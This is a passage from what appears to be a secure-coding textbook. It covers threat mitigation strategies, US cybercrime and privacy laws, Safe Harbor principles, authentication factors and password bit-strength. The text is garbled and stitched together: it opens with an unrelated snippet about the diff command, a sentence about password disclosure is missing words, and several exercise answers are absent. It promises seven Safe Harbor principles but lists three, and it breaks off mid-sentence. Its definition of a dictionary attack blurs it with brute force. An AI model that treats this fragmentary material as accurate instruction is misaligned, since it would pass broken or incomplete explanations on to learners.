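Output of this form can be reproduced with the diff command itself. A minimal demonstration, with illustrative one-line files standing in for the two versions of the source:

```shell
# Create two versions of a source file (file names are illustrative).
printf 'while (string::npos != iEnd);\n' > old.cpp
printf 'while (string::npos != iEnd && !sFullName.empty());\n' > new.cpp

# diff prints a change command (here "1c1"), the removed lines marked
# with <, and the added lines marked with >. It exits nonzero when the
# files differ, which is expected here.
diff old.cpp new.cpp || true
```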
Preemption
Imagine a soldier watching an invasion army gather just across the border. An
attack is surely going to occur. Why wait for it to happen on the enemy’s terms?
Wouldn't it be better to strike first before the enemy is ready? In this scenario,
the soldier is contemplating preemption.
Definition: Preemption is the process of striking offensively against a likely threat agent prior to an intrusion attempt for the purpose of lessening the likelihood of a particular intrusion occurring later.
Example: In the context of protecting my car, it might include seeking out known car thieves in a given neighborhood before attempting to park a car. By removing all the potential attackers, none is left to damage the car.
Advantage: The primary advantage of preemption is that the attack never occurs; none of the other defensive measures ever come into play.
Deterrence
At all points in time, the attacker has to ask himself: is it worth it? If the asset is
worth the risk, then the attacker will probably launch the attack. Otherwise, he
probably will not. Deterrence is the process of manipulating this decision process.
Example: In the context of protecting a car, it might include increasing the penalty of car theft. Thieves would then not target cars because the rewards would not be worth the risks. A mob boss might also use deterrence to protect his car. No one in their right mind would take “Big Jimmy’s” car because the consequences would be severe.
Advantage: The attacker does not see the value in launching an attack, so the attack never occurs.
Disadvantage: The process of devaluing the targeted asset might have the side effect of making the asset not valuable to the customer as well. Also, modification of the risk side of the equation is often an expensive and difficult process.
The main deterrence mechanism is the force of law. There are several laws
governing behavior on the Internet. The most important are the National
Information Infrastructure Protection Act (NII), Digital Millennium Copyright Act
(DMCA), Child Online Protection Act (COPA), Computer Fraud and Abuse Act, and the Identity Theft and Assumption Deterrence Act. These and other laws and statutes
cover a wide range of Internet activities.
Malware
Malware is defined as a piece of software designed with malicious intent.
There are two main laws regulating malware:
Computer Fraud and Abuse Act: This act makes it illegal to gain unauthorized access to a protected computer, distribute malware, and distribute authentication data.
Digital Millennium Copyright Act (DMCA): Though this law mostly pertains to Digital Rights Management (DRM), it also makes it illegal to create or distribute technology designed specifically to circumvent security mechanisms.
Though only one person (Robert Morris, author of the Morris Worm) has ever
been prosecuted under the original Computer Fraud and Abuse Act (US v. Morris,
1991), the frequent revisions of this law have made it the mainstay of cybercrime
deterrence.
Spyware
Spyware is defined as a program hiding on a computer for the purpose of
monitoring the activities of the user. There are two main laws regulating spyware:
Safeguard Against Privacy Invasions Act (SPY-ACT): This act makes it illegal to write or distribute programs that are deceptive, collect PII (Personally Identifiable Information), disable anti-malware scanners, or install botware.
Software Principles Yielding Better Levels of Consumer Knowledge Act (SPY BLOCK): This act makes it illegal to install software through unfair or deceptive acts. Disclosure of PII must be made through consent of the user. This bill never became law because it was never brought before the Senate or House to vote.
Though the stronger SPY BLOCK was never made law, SPY-ACT is sufficient to define spyware and regulate the creation and distribution of spyware.
Denial of Service
A Denial of Service (DoS) or Distributed Denial of Service (DDoS) attack is an attack
designed to render a system unavailable for its intended use. There is one act regulating DoS and DDoS attacks:
National Information Infrastructure Protection Act (NII): An amendment to the Computer Fraud and Abuse Act making it illegal to intentionally cause damage to another computer or system even if the attacker never circumvented authorization mechanisms.
Though NII makes DoS and DDoS attacks illegal, it has proven to be very difficult
to prosecute. There are two factors contributing to this fact. First, it is often difficult to prove that $5,000 in damages was incurred due to the attack. Second,
it is often difficult to identify the attacker.
SPAM
SPAM is irrelevant or inappropriate messages sent on the Internet in large
numbers. One law was created to capture all aspects of SPAM:
Controlling the Assault of Non-Solicited Pornography and Marketing Act (CAN-SPAM): It is illegal to hire a spammer to send SPAM on your behalf, send SPAM to users who have opted out, fake an e-mail header, or send inappropriate content to minors.
SPAM violators can be fined up to $6,000,000 for violations. However, since CAN-
SPAM’s jurisdiction is the United States, it can do nothing to address SPAM
originating from other countries.
Phishing
Phishing is defined as impersonating reputable companies in order to obtain
personal information. There are three laws regulating phishing:
Bank Fraud Act: It is illegal to defraud a financial institution or to obtain any financial benefit by spoofing a financial institution. Maximum penalty is $1,000,000 and 30 years imprisonment.
Computer Fraud and Abuse Act: It is illegal to use botnets and many spoofing techniques to create believable phishing messages.
Controlling the Assault of Non-Solicited Pornography and Marketing Act (CAN-SPAM): It is illegal to send large numbers of unwanted messages, which is the typical delivery mechanism for phishing attacks.
Phishers are actively pursued by the federal government through the Federal
Trade Commission (FTC). Additionally, the Anti-Phishing Working Group is a
private watch-dog organization helping to identify and mitigate phishing attacks.
Identity Theft
Identity Theft is the process of assuming another’s identity without permission.
There are three laws regulating identity theft:
Identity Theft and Assumption Deterrence Act: It is illegal to transfer unauthorized or false identification documents.
Internet False Identification Prevention Act: It is illegal to distribute counterfeit identification documents and credentials.
SAFE ID Act: Generalizes identification to any means of identifying an individual, including most forms of PII. This act never became law.
These laws make it unlawful to “knowingly transfer or use without lawful
authority, a means of identification of another person with the intent to commit
or to aid or abet any unlawful activity that constitutes a violation of federal law.”
Children
Children are afforded special protection under the law. Most of this protection is specified in one law:
Child Online Protection Act (COPA): It is illegal to distribute inappropriate content to minors.
The main components of this law regulate the following types of material:
• The “average person, applying contemporary community standards, would find” that the material taken as a whole, with respect to minors, was designed to appeal to or pander to prurient interests. This means that the law is defined in relation to society norms.
• The material depicted, described, or represented, “in a manner patently offensive with respect to minors, an actual or simulated sexual act or sexual contact, an actual or simulated normal or perverted sexual act, or a lewd exhibition of genitals or post-pubescent female breasts.”
• The material, taken as a whole, lacked “serious literary, artistic, political, or scientific value for minors.”
If deterrence is to be pursued as a threat mitigation strategy, it is necessary to
identify the law or policy the attacker would violate, how knowledge of the law
or policy would be communicated to the potential attacker, and what the
consequences of such a violation would entail. For example, consider an
organization wishing to deter users from playing online games on the company
network. The organization would need to create a policy forbidding playing of
online games, this new policy would have to be communicated to all employees
through an e-mail or some other avenue, and then administrators would be given
the authority to disable the account of a user if the user is found playing the game.
Deflection
Perhaps the importance of deflection is best described by Winston Churchill: “In
time of war, the truth is so precious, it must be attended by a bodyguard of lies.”
Disadvantage: A determined or educated attacker will not be fooled. In other words, the more knowledgeable and determined the attacker, the more difficult it would be to deceive him.
The point of deflection defenses is to trick the attacker into not launching an
attack against an actual asset, instead diverting him to a harmless location. This
can be accomplished by creating a fake asset which appears so desirable that the
attacker is compelled to pursue it. Note that deflection techniques of this nature
are only as effective as the believability of the deception; if the attacker catches
on, the game is up.
Another class of deflection defenses strives to confuse the attacker, making it
difficult for him to separate what is real and what is fabricated. By showering the
attacker with contradictory information, his ability to find the information he
seeks becomes exceedingly difficult.
Detection
Detection is the process of identifying an intrusion. This detection can occur
during the intrusion attempt or long after the fact. It can happen automatically or
with significant human intervention. It can be elaborate, involving hardware
tools, software tools, and policy, or it may be as simple as a log. In each case, the
end result of detection is an alert.
Example: In the context of protecting a car, the classic detection mechanism is a car alarm. Its only function is to detect break-in attempts so the police or others can stop them.
Note that detection mechanisms are often employed for non-mitigation reasons.
For example, consider a company storing a large number of usernames and
passwords in a database. The company may choose to create a fake account and
include the credentials in the database. If anyone attempts to use the fake
account, then the company can detect that the database was compromised. This
gives the company knowledge that an attack occurred without mitigating the
underlying vulnerability in any way.
For any detection system to be effective, it is necessary to continually monitor all
the activity of a system in an effort to identify suspicious activity. Thus all
detection mechanisms must be complete, reliable, timely, and understandable:
Complete: Detect a wide variety of intrusions, including attacks originating from inside or
outside the system as well as known and unknown attack vectors. The
completeness goal is necessary to give the user of the system confidence that
all intrusion attempts, especially the successful ones, are known. If all successful
intrusions are not detected, then it is difficult for the system to make
confidentiality assurances. However, even if there are no successful attacks,
understanding the number and composition of attempts is important when
contemplating future changes to defensive measures.
Reliable: Reliability is the measure of the probability that a given attack will be
recognized. If, for example, an attack will be detected five times out of ten,
then it has 50% reliability. Detection systems need to be sufficiently reliable so
that they can be trusted. This typically means a reliability rating of close to
100% in most cases. False positives will train users to ignore (or at least take
less seriously) possible attacks. False negatives will miss real attacks. For the IDS
(Intrusion Detection System) to reach its full potential of being a reliable alarm
system, accuracy is required.
Timely: Timeliness means that the point at which an intrusion is detected should be close to the time when the intrusion occurred. Timeliness is required if any action is
to be taken against an ongoing attack. This gives the defender the opportunity
to make an appropriate response. Butch Cassidy, the famous outlaw from the
wild west, compromised the timeliness of existing detection mechanisms by
cutting the telegraph wires near the banks he was planning on robbing, thereby
giving him more time to make his getaway.
Understandable: Understandability is the function of presenting warnings and analysis in a coherent fashion. Ideally, this would be as simple as a green or red light, but since intrusions are often complex, more detailed analysis is often needed. Because the human
component is an important part of any detection mechanism, the
understandable goal is also important. In other words, it is less than optimal to
barrage the user with a stream of incomprehensible data when an intrusion has
been detected. Instead, the IDS should present information in such a way as to
encourage the user to draw appropriate conclusions and take the appropriate
action. A key component of this is allowing the user to know the severity and
scope of the attack.
If detection is to be used as a threat mitigation strategy, then a detailed
procedure will have to be created describing how the attack will be detected in a
complete, reliable, timely, and understandable manner. All four of these issues
will need to be addressed.
Countermeasures
In the simplest possible terms, countermeasures are detection coupled with
prevention. First an attack is detected, and then the defenses are strengthened.
Advantage: An attacker is not likely to continue if the difficulty has increased significantly due to his activities. Similarly, if the likelihood of being caught increases, the attacker may be persuaded to cease his attack.
There are very few countermeasure tools and techniques in security. Part of the
problem is that if the attacker can get the defensive mechanisms to activate
prematurely, then a denial of service attack could result. For example, consider a
disgruntled employee wishing to harm his former employer. He considers burning
his employer’s offices, but that is too risky (deterrence). He considers breaking in
at night to steal important assets, but the locks are too strong (prevention).
Finally, he decides to trigger an alarm during a busy time of the day. This results
in the business being shut down for hours and a great deal of lost business.
For countermeasures to be effective, there needs to be a well-defined difference
between the “normal” state of operation and the “alert” state. There also needs to be a well-defined protocol to transition back and forth between the two states.
For example, consider a colony of ants. They normally go about their business
collecting food. However, if you were to pour a glass of water onto their ant hill,
they run around much faster and the warrior ants come to the surface. Then, after
a while, everyone gets the signal that the attack is over and everyone returns to
normal.
In the computational world, the “alert” state of a system is usually characterized
by more detailed logging, more scrutiny of activities by various employees, and
restricted access to assets.
Examples
1. Q What is the difference between a code review and threat modeling?
A Code review is the process of looking through all the code in search of defects, while threat modeling focuses on the parts of the code where vulnerabilities are most likely to be dangerous.
2. Q Name the threat mitigation strategy based on the following description: A mob
boss makes grave threats to anyone who even thinks of stealing his possessions.
A Deterrence. The repercussions are severe if the mob boss finds out it was you.
4. Q Name the threat mitigation strategy based on the following description: When
I was a boy, I wedged a piece of paper in the crack of my bedroom door so I
could tell if my sister was sneaking into my room. If she opened the door, the
paper would fall to the ground.
A Detection. The paper was designed to let me know an intrusion had occurred; it did nothing to prevent it.
5. Q I am the owner of a small business. Identify the anti-intrusion tool used in the
following mechanism to protect my business: There is an alarm on the doors
and windows that I activate every night.
A Detection. The alarm does nothing other than inform people that an intrusion
is underway.
6. Q I am the owner of a small business. Identify the anti-intrusion tool used in the
following mechanism to protect my business: My business was built next door
to a jewelry store.
7. Q I am the owner of a small business. Identify the anti-intrusion tool used in the
following mechanism to protect my business: I have put the valuables in a very
strong safe.
8. Q I am the owner of a small business. Identify the anti-intrusion tool used in the
following mechanism to protect my business: I posted a sign which reads
“shoplifters will be prosecuted”
A Deterrence. I am hoping the threat of punishment will keep people from stealing
my valuables.
9. Q I am the owner of a small business. Identify the anti-intrusion tool used in the
following mechanism to protect my business: I am always on the lookout for
suspicious behavior.
10. Q I would like to use all six anti-intrusion methods to protect my wallet as I walk
the street at night.
11. Q A network administrator heard through the grapevine that one of the users has
installed a password cracking program with the intention of launching an
elevation of privilege attack. Provide a prevention mitigation for this potential
attack.
12. Q The president of a university heard that some students are using file sharing
software to illegally distribute copyright-protected music. Provide a detection
mitigation for this problem.
13. Q I am writing a simple game for a mobile device. This game keeps the high score
list in a separate file. The integrity of the game will be severely compromised if
people can just edit the score file to make it appear that they have achieved an
impressive score. Describe a countermeasure mitigation strategy to address this
threat.
14. Q I am writing a password managing program for the iOS platform. I am concerned
that, if a user’s phone is stolen, an attacker may attempt to crack the master
password using a brute-force attack. Describe a deterrence mitigation for this
potential attack.
A I would create a notice informing users that police would be notified of attempts
to crack the password. I would then use the phone’s GPS feature to send attack
attempts to the police.
Exercises
1 From memory, list the three types of injection vulnerabilities and describe their
distinguishing characteristics.
6 Name the anti-intrusion approach used in each of the following scenarios:
• Germany invaded France in WWI because, at that time, France possessed a purely offensive army and Germany was afraid of an imminent invasion.
• A high-ranking officer or leader frequently travels with a couple of body-doubles.
• The A-10 Thunderbolt II close air support ground-attack aircraft shields the pilot and critical gear in a titanium tub that can withstand small-arms fire.
• Many attribute the fact that WWIII was never fought to the policy of “Mutually Assured Destruction” or MAD.
• When a U-Boat attacks a convoy, the defending destroyers respond by trying to sink the attacker with depth-charges.
• During WWII, the Allies (and probably Axis) employed spies around every Nazi airbase so a warning could be sent when an attack was imminent.
Dearly beloved, avenge not yourselves, but rather give place unto wrath: for it
is written, Vengeance is mine; I will repay, saith the Lord.
Describe this warning in the context of mitigation strategies.
Problems
1 Please define the following terms:
• Code Review
• Threat Modeling
• Code Hardening
2 From memory, please list and define the six ways to mitigate a threat.
3 A network administrator heard through the grapevine that one of the users has
installed a password cracking program with the intention of launching an
elevation of privilege attack. Provide a preemption mitigation for this potential
attack.
4 The president of a university heard that some students are using file sharing
software to illegally distribute copyright-protected music. Provide a deterrence
mitigation for this problem.
5 I am writing a simple game for a mobile device. This game keeps the high score
list in a separate file. The integrity of the game will be severely compromised if
people can just edit the score file to make it appear that they have achieved an
impressive score. Describe a deflection mitigation strategy to address this
threat.
6 I am writing a blogging tool for a large company. The administrator of the tool
said he will want to know if anyone inside or outside the company tries to get
unauthorized access to a given contributor’s blog. Describe a detection strategy
to fulfill the administrator’s need.
8 I am worried that students will steal my final exam key which is currently on my
desk in my locked office. Being paranoid, I wish to use every possible anti-
intrusion approach to prevent the test from being taken. What should I do?
Unit 3: Privacy
Of the three computer security assurances (C.I.A.), confidentiality is perhaps the
least understood. Many people believe that the need for confidentiality is limited
to those who have something to hide. Criminals need confidentiality so their
plans are not exposed. Liars need confidentiality so their true intent is kept under
cover. It is self-evident why military organizations and spies need confidentiality.
Why would a law-abiding member of society need confidentiality? There are
three main reasons: the law, protection of assets, and protection from
embarrassment.
Law: First, privacy standards are often stipulated by law. Many laws govern medical,
academic, and financial records. Laws similarly specify anonymity requirements
for minors and other vulnerable populations. Finally, many institutions set
privacy provisions when interfacing with their assets.
Protection of Assets: Second, most citizens have confidential data that, if disclosed, could lead to their assets being compromised. If my credit card number, social security number, or
location of my hidden house key were revealed, then others would have access
to the assets they protect. It is often difficult to predict the extent a malicious
individual could exploit a seemingly innocuous piece of confidential data.
Protection from Embarrassment: Finally, there is a difference between that which is secret and that which is sacred. In other words, people cannot function normally when their every move
is watched and recorded. For example, though everyone goes to the bathroom
periodically, one would not want a public record of their visits there. This would
be embarrassing.
The need for confidentiality is rooted not in users having things to hide (Solove, 2007),
but rather in individuals having control of their own information (Caloyannides,
2003). An individual retaining control over confidential information is able to
ensure that others cannot use their information against them. So the question
remains: how does one know when a computer system offers sufficient
confidentiality assurances? One answer, and perhaps the most universally agreed
upon answer, is Safe Harbor (Farrell, 2003).
Defining Privacy
In 1998, the European Commission put into effect a directive on data protection, prohibiting the transfer of personal data to non-European Union nations failing to meet a European standard for adequate privacy protection. This directive would have prevented U.S. companies from conducting trans-Atlantic transactions with European companies. As a result, the U.S. Department of Commerce worked closely with the European Commission to develop a framework, called Safe Harbor, that U.S. companies could follow to ensure compliance with the EU’s privacy standards. There are seven principles of Safe Harbor with which a participating organization must comply. These are data integrity, enforcement, access, choice, onward transfer, notice, and security (D.E.A.C.O.N.S.):
Data Integrity: Data integrity refers to the reliability of data collected. The organization should take steps to ensure that data is complete and accurate. Additionally, the organization should ensure that collected data is relevant to the purpose for which it is being collected.
Choice: Choice refers to the organization giving the individual choice. The organization must allow the individual to opt out from having personal information disclosed to a third party or from being used for a purpose other than the original intent. For sensitive information, the individual must explicitly opt in to allow data to be transferred to a third party or to be used for anything other than the original purpose for which the data was collected.
Notice
Notice refers to a company’s responsibility to inform individuals about what data
will be collected and how it will be used. This includes notification of what types
of third parties might receive the collected data, as well as what choices and
methods the individual has for limiting how the organization will use the
collected data. The organization must also provide contact information in case of
inquiries or complaints.
Chapter 10: Authentication
A critical component of providing the confidentiality assurance is ensuring that the user is who he or she
claims to be. There are many ways to do this. The important skill of this chapter is to be able to
choose an appropriate authentication scheme so as to provide confidentiality assurances to the user.
Figure 10.1: The relationship between a principal, subscriber, applicant, and claimant
There are several components to the digital identity process:
Agent An agent is a presence on a system. An agent is also known as a digital identity,
an online persona, an account, or even a login. A system can represent an agent
in a variety of ways, from an account ID to ticket (a key representing a single
session on the system).
Credential The artifact a claimant presents to the system to verify that they are a subscriber.
In the simplest case, credentials could be a username and password pair.
It is important to understand that a principal is not an agent. Recall that a principal
is a user or set of users. An agent is the user’s presence on the system. An agent
is also distinct from the credentials, though many refer to a given agent by the
credentials they use to access it. Note that there may be more than one principal
tied to a given agent (when more than one person has the authentication
credentials) and one principal may have more than one agent (when a single
person has multiple authentication credentials). There are several processes
involved with the digital identity process:
Authentication Authentication is the process of tying a subscriber to an agent. This occurs when
a claimant presents the system with credentials. The authentication system then
verifies the credentials, activates the corresponding agent, and gives the
subscriber the ability to control the agent.
Verifier The part of the authentication process that verifies if the claimant’s credentials
match what the system expects them to be.
Enrollment Enrollment is the process of an applicant becoming a subscriber. For this to occur,
an agent is created on the system representing the new subscriber. The system
also presents the new subscriber with credentials with which the subscriber can
authenticate.
Identity Manager The collection of processes and components used to represent digital identities,
handle enrollment, authenticate, and provide similar related services.
To see how these various interactors, components, and processes relate, consider
the following data flow diagram. Notice how the identity manager maintains the
set of credentials necessary to authenticate all the subscribers on the system as
well as represent the system’s digital identities.
Figure 10.2: A simplified identity management system (a data flow diagram relating the subscriber, the
credentials, the verifier, the agent, and the identity manager)
The heart of an identity manager is the authentication system. This function
accepts credentials from a claimant and returns an agent token. It is with this
token that system interactions are logged and access decisions are made.
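The relationship between credentials, the verifier, and the agent token can be sketched in code. The class below is a toy illustration only; the names (IdentityManager, enroll, authenticate) are invented for this sketch, and it stores plaintext passwords purely to keep the example short (the Handling Passwords section later in this chapter explains why real systems must not).

```python
import secrets

class IdentityManager:
    """Toy identity manager; all names here are invented for illustration."""

    def __init__(self):
        self._credentials = {}  # username -> password (plaintext only to
                                # keep the sketch short)
        self._sessions = {}     # ticket -> username (active agents)

    def enroll(self, username, password):
        # Enrollment: an applicant becomes a subscriber.
        self._credentials[username] = password

    def authenticate(self, username, password):
        # Verifier: check the claimant's credentials against expectations.
        if self._credentials.get(username) != password:
            return None
        # Activate the agent: issue a ticket for this session.
        ticket = secrets.token_hex(16)
        self._sessions[ticket] = username
        return ticket

idm = IdentityManager()
idm.enroll("alice", "hunter2")
ticket = idm.authenticate("alice", "hunter2")
```

All subsequent interactions would be logged against this ticket rather than against the credentials themselves.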
What level of assurance should an authentication system provide? This depends
on the value of the assets that the system protects. Some considerations include
the following, in rough order from least severe to most severe:
• Inconvenience. An example might be the ability to renew a library book online
rather than traveling to the local library to perform the same operation manually.
• Distress or damage to reputation. An example of this would be a social media
provider where a subscriber’s online presence represents a significant
component of his or her feeling of well-being.
• Protection of sensitive information. Most of the time, breaches at this level give
an attacker the ability to impersonate a legitimate user.
• Financial loss. Disclosure of a credit card or bank account number would be an
example.
• Civil or criminal violation. An example would be tampering with legal records or
documents.
• Personal safety. Protection of medical records or specification of medical
procedures often falls in this category.
• Public interests. Tampering with elections, public utilities, or other critical
services potentially impacts the lives of many people.
The larger the impact of an authentication breach, the more careful one must be
in the choice of authentication mechanism, credential distribution, and session
management.
There are three basic types or factors of authentication that may be employed on
a given system: what you have, what you know, and who you are:
What you Have Tie an agent to a principal through possession of some key.
What you Know Tie an agent to a principal through presentation of some information.
Who you Are Tie an agent to a principal through direct measurement of the individual.
A single-factor authentication scheme is one where one mechanism is used to tie
the agent to the principal. An example might be a key to a car or a username /
password combination. Multi-factor authentication, on the other hand, uses
more than one mechanism. In most cases, multi-factor authentication involves more
than one type: “have” paired with “know” or “are” paired with “have.” Most
believe that multi-factor authentication is more secure than single-factor because
an attacker would need to use different techniques to defeat each component.
What You Have
“Have” authentication schemes, also known as object-based authentication, tie
principals to entities through a physical token. The underlying assumption of
“have-factor” authentication is that only members of the entity group have
possession of the token.
Criteria
What-you-have or token-based authentication systems are designed to be easy
to transfer, reliable to validate, inexpensive, and difficult to replicate. These four
criteria are often at odds with each other.
Easy to transfer The easy to transfer criterion is readily achieved by most token-based
authentication schemes because they usually take the form of a physical device.
Most tokens are small, light, and portable. Virtually all the tokens used to
authenticate today have this property: keys, ID cards, smart-cards, and other
tokens. Not all keys follow this rule, of course.
Reliable to validate The reliable to validate criterion is a function of the reliability of the
authentication process of which the token itself plays only part of the role. Car
keys must work 100% of the time or risk leaving the rightful owner of the vehicle
stranded. An example of a common authentication system failing the reliability
goal is a driver’s license. While police officers might be very good at spotting an
in-state counterfeit driver’s license, they will probably be less adept with distant
or rare licenses.
Inexpensive The inexpensive criterion has two components: the cost of the token and the cost
of the validation mechanism. In cases where many individuals need to be
authenticated at a single point, key cost is more important than validation cost.
Consider a factory worker entering a single gate while going to work. With many
keys distributed to many workers, it must be a low-cost key for the
authentication system to work. The opposite is true when a small number of
individuals need to access a large number of secure locations. An example would
be a security guard working in a large petroleum installation. Here it would make
more sense to have an inexpensive lock and a more expensive key. Most token-
based authentication systems have inexpensive keys and a more expensive
validation mechanism. It is interesting to note that some authentication schemes
are designed to be expensive. Items designed to signify rank such as royal crowns
and Native American head-dresses are authentication tokens (signifying who is
in charge).
Difficult to replicate The final criterion is that keys are meant to be difficult or impossible to replicate.
A car or house key fails this test of course. As a result, it is extremely difficult for
the owner of the car or house to be sure that he or she controls all copies of the
keys.
When choosing a “have” authentication scheme, it is important to weigh these
criteria against the specific needs of your application. A scenario where convenience
is paramount would prioritize easy transfer, few false-positives, and
minimal expense. On the other hand, a scenario maximizing security would
prioritize minimizing false-negatives and making the token difficult to replicate.
Examples
By far the most common token-based authentication is the common key.
However, due to its aforementioned weaknesses, the common key is seldom used for
serious security applications. Two examples of secure token-based
authentication common today are RSA SecurID tokens and smart cards.
Traditional Credit Card Traditional credit cards have a magnetic strip containing authentication
information. They are easy to transfer (hand the card to another principal),
reliable to validate (most card readers have a high success rate), and inexpensive.
However, since the magnetic strip is easily read with a standard card-reader and
is also easy to write, the card can be easily replicated. It thus fails the difficult to
replicate criterion.
Transponder Chip Car Key Modern cars have a transponder chip embedded in the key. The car will not start,
even when a matching key is inserted into the ignition, unless the chip is present. These
tokens are easy to transfer (hand the key to another principal) and reliable to
validate (it is almost unheard-of for a key to fail to start a car). Unfortunately,
they are expensive. Many companies charge from $50 - $100 to make a new key.
They are difficult to replicate because the act of opening the key to read the chip
also destroys the chip.
RSA SecurID The RSA SecurID is a token containing a small computer that generates a new key
every 30 seconds. When a user wishes to authenticate, he or she types the
password currently displayed on the SecurID screen. For the authentication
process to be completed, the token and the validator must be in sync. SecurID
tokens are designed to resist tampering; opening or otherwise probing the device
causes the device to malfunction thereby destroying the protected key. RSA
SecurID keys meet all the requirements for a good “what-you-have”
authentication mechanism: they are easy to transfer due to their size, relatively
inexpensive (about $50 each), reliable, and difficult to replicate.
Smart Card Smart cards are similar to traditional credit cards or ID cards with the addition of
an embedded chip containing authentication information. The chip is specifically
designed to make tampering or duplication difficult; extracting the chip typically
results in destruction of the chip. Smart cards also meet all the requirements for
a good “what-you-have” authentication mechanism: they are easy to transfer
(they are the size and weight of a standard credit card), inexpensive, reliable, and
difficult to replicate.
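The SecurID idea of a key that changes every 30 seconds can be sketched with a time-based one-time code. RSA’s actual SecurID algorithm is proprietary; the sketch below instead follows the general TOTP approach (an HMAC over a time-step counter), with an invented secret, purely to illustrate how the token and the validator stay in sync.

```python
import hashlib
import hmac
import struct

def time_code(secret, timestamp, step=30, digits=6):
    # A new code is derived for each `step`-second window.
    counter = timestamp // step
    msg = struct.pack(">Q", counter)
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    # Dynamic truncation: pick 4 bytes based on the last nibble.
    offset = digest[-1] & 0x0F
    value = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % (10 ** digits)).zfill(digits)

# The token and the validator compute the same code as long as their
# clocks agree on the current 30-second window.
secret = b"shared-seed"   # illustrative; real seeds are provisioned securely
code = time_code(secret, 1_000_000_000)
```

Note how the shared secret never crosses the network; only the short-lived code does.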
As a general rule, what-you-have authentication methodologies are more the
domain of mechanical engineers and computer engineers; unless you work for a
company producing such tokens, it is unlikely that you will ever develop code
specific to such an authentication mechanism. That being said, tokens are
frequently used as part of multi-factor authentication so they are commonly part
of the larger security strategy for a given information system.
What You Know
“Know” authentication schemes, also known as knowledge-based authentication,
tie principals to entities through possession of knowledge. The underlying
assumption of know-factor authentication is that only members of the entity
group have possession of the knowledge. A common example of “know”
authentication is the password.
In the simplest implementation, password authentication occurs when a user’s
typed password is compared letter-for-letter against a known expected
password. This implementation is vulnerable to a wide variety of attacks because
the software must store a copy of the expected password. More secure systems
keep only an encrypted copy of the password in memory. The user’s typed
password is then encrypted using the same mechanism. If the two encrypted
versions are identical, then the user is authenticated. Note that the system never
needs to know how to decrypt a password since only encrypted passwords are
compared.
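The encrypted-comparison scheme described above can be sketched as follows. This is a minimal illustration, not a production design; PBKDF2 stands in here for whatever one-way transformation a real system would choose, and the salt size and iteration count are illustrative.

```python
import hashlib
import hmac
import os

def one_way(password, salt):
    # One-way transformation: the stored value can be computed from the
    # password, but the password cannot be recovered from the stored value.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

salt = os.urandom(16)
stored = one_way("correct horse", salt)   # all the system ever keeps

def verify(candidate):
    # Transform the typed password the same way and compare the results;
    # the expected password is never stored or decrypted.
    return hmac.compare_digest(one_way(candidate, salt), stored)
```

If the two transformed values are identical, the user is authenticated; at no point does the system need the plaintext expected password.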
Security of a Password
The security of a password is a function of how many candidates an uninformed
attacker must attempt before correctly guessing the password. The traditional
way to measure the strength of a password is the bit-strength, given as:
bits = log₂(nᵐ) = m · log₂(n)
Figure 10.3: An equation to compute the strength of a password measured in bits.
Here n is the size of the alphabet and m is the length of the password.
For example, assume that a bank allows a four-digit PIN (m = 4). This
password has an alphabet size of n = 10 (the number of possible digits). The
number of combinations is 10,000, or 10⁴. In order to compute the bit strength,
we need to figure out how many bits are required to represent this number.
Observe that 2¹³ = 8,192 and 2¹⁴ = 16,384; 10,000 falls between these numbers.
We take the lower of these two as the bit strength (because we would
need a full 16,384 combinations for the password to be a full 14 bits strong).
In contrast, the password “aZ4%” has an alphabet size of n = 94 (a–z + A–Z + 0–9 +
symbols). The number of combinations is 94⁴, or 78,074,896. Since 2²⁶ =
67,108,864 and 2²⁷ = 134,217,728, we can see that the bit strength of
this password is 26 bits.
Now we will compare the relative strengths of the PIN and the password
containing a mixture of numbers, letters, and symbols. The first has 13 bits of
strength and the second has 26 bits. It would be a mistake to think that the text
password is merely twice as strong because it has twice the number of bits. In fact,
a 14-bit password is twice as strong as a 13-bit password. The text password is
instead 13 bits, or 2¹³ times, stronger. Since 2¹³ is 8,192, we can see that the text
password is more than eight thousand times stronger!
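The bit-strength computation above can be expressed directly. The function below is a straightforward sketch of the equation in Figure 10.3, flooring the result as the text does:

```python
import math

def bit_strength(alphabet_size, length):
    # bits = floor(log2(n^m)) = floor(m * log2(n))
    return math.floor(length * math.log2(alphabet_size))

pin_bits = bit_strength(10, 4)    # four-digit PIN
text_bits = bit_strength(94, 4)   # four characters from a 94-symbol alphabet
ratio = 2 ** (text_bits - pin_bits)
```

The ratio works out to 2¹³ = 8,192, matching the comparison above.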
The time required to crack a password is a function of the size of the search space
and the speed at which guesses can be made. Thus, to strengthen a password
system, two main approaches are available: require stronger passwords (as
measured by the bit-strength), or make guessing more difficult. There are several
strategies for the latter:
Slow password validation If the authentication system takes a second to validate a password, then far
fewer passwords can be attempted in an hour than on a system performing
validation in a microsecond.
Limited number of guesses If the authentication system locks the user out after a small number of attempts,
then only a small part of the search space can be explored.
Exponential validation If the first attempt takes one second, the second two, and the third four, then it
will take an exceedingly long time to make 20 attempts (about a million
seconds, or roughly twelve days). This frustrates brute-force attacks (see below) because it
becomes impractical to try a large number of guesses.
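The exponential validation strategy is easy to express: if each failed attempt doubles the delay, the total wait for 20 attempts is a geometric sum. A minimal sketch:

```python
def validation_delay(attempt):
    # One second for the first attempt, doubling after each failure.
    return 2 ** (attempt - 1)

# Total time an attacker must wait to make 20 consecutive guesses:
total_seconds = sum(validation_delay(a) for a in range(1, 21))
days = total_seconds / 86_400
```

The sum is 2²⁰ − 1 = 1,048,575 seconds, a little over twelve days for a mere 20 guesses.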
In the worst case, the attacker has access to the encrypted password and can run
through many attempts on a dedicated computer without involving the target
system.
Cracking Passwords
Passwords can be recovered by an attacker in one of three ways: guess the
password based on knowledge of the individual creating the password, trick the
system into disclosing the password, or launch a dictionary attack.
Knowledge The first method, guessing based on knowledge, leverages the fact that humans
do a poor job of generating strong passwords. A list of the most common
passwords was compiled by the Openwall Project.
Disclose The second method, tricking the system into disclosing a password, is a function of
unencrypted state or if clues to the password’s composition can be gathered by
how attempts are validated, then passwords can be recovered in a very small
number of attempts.
Dictionary Attack The final method, dictionary attack, is the most common password cracking
strategy. It involves trying every possible password one by one. Most dictionary
attacks try passwords in a sorted order with the most likely passwords (typically
the shortest or most common) attempted first. There are many tools (Cain &
Abel, Crack, and others) designed to do this.
When the attacker has access to the encrypted password, more advanced
dictionary attack techniques can be used. One such technique is called a rainbow
table, a pre-computed table representing an entire password dictionary. This
technique is extremely fast, cracking a 14 character alphanumeric password (85
